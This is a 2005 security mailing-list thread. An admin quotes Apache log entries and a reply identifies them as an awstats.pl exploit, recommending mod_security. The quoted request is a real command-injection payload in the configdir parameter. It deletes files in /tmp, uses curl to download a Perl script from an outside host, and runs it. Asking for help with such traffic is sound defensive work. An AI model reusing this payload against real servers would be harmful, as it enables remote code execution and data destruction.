Security Basics mailing list archives
Re: GET //awstats.pl? in apache logs
From: ilaiy <ilaiy.e () gmail com>
Date: Mon, 24 Oct 2005 09:24:24 -0500
It is a awstats.pl exploit .. Try installing http://www.modsecurity.org/ ./thanks ilaiy On 10/21/05, Konstantine <listclient () gmail com> wrote:
My apache logs show rows after rows of following, all from various IP addresses. This started a couple of days ago. I don't have awstats. Could somebody tell me what is that? Is there anything I should be doing? thanks.K. GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1
Current thread:
- GET //awstats.pl? in apache logs Konstantine (Oct 24)
- Re: GET //awstats.pl? in apache logs ilaiy (Oct 24)
- Re: GET //awstats.pl? in apache logs Andreas Constantinides (MegaHz) (Oct 24)
- Re: GET //awstats.pl? in apache logs FocusHacks (Oct 24)
- Re: GET //awstats.pl? in apache logs Can't dig that daddy (Oct 24)
- RE: GET //awstats.pl? in apache logs mail list (Oct 24)
- Message not available
- Fwd: GET //awstats.pl? in apache logs Tobias Hahn (Oct 25)
- RE: GET //awstats.pl? in apache logs mail list (Oct 24)
- Re: GET //awstats.pl? in apache logs S.A. Birl (Oct 24)
- Re: GET //awstats.pl? in apache logs Konstantine (Oct 25)
- <Possible follow-ups>
- Re: GET //awstats.pl? in apache logs [a] (Oct 24)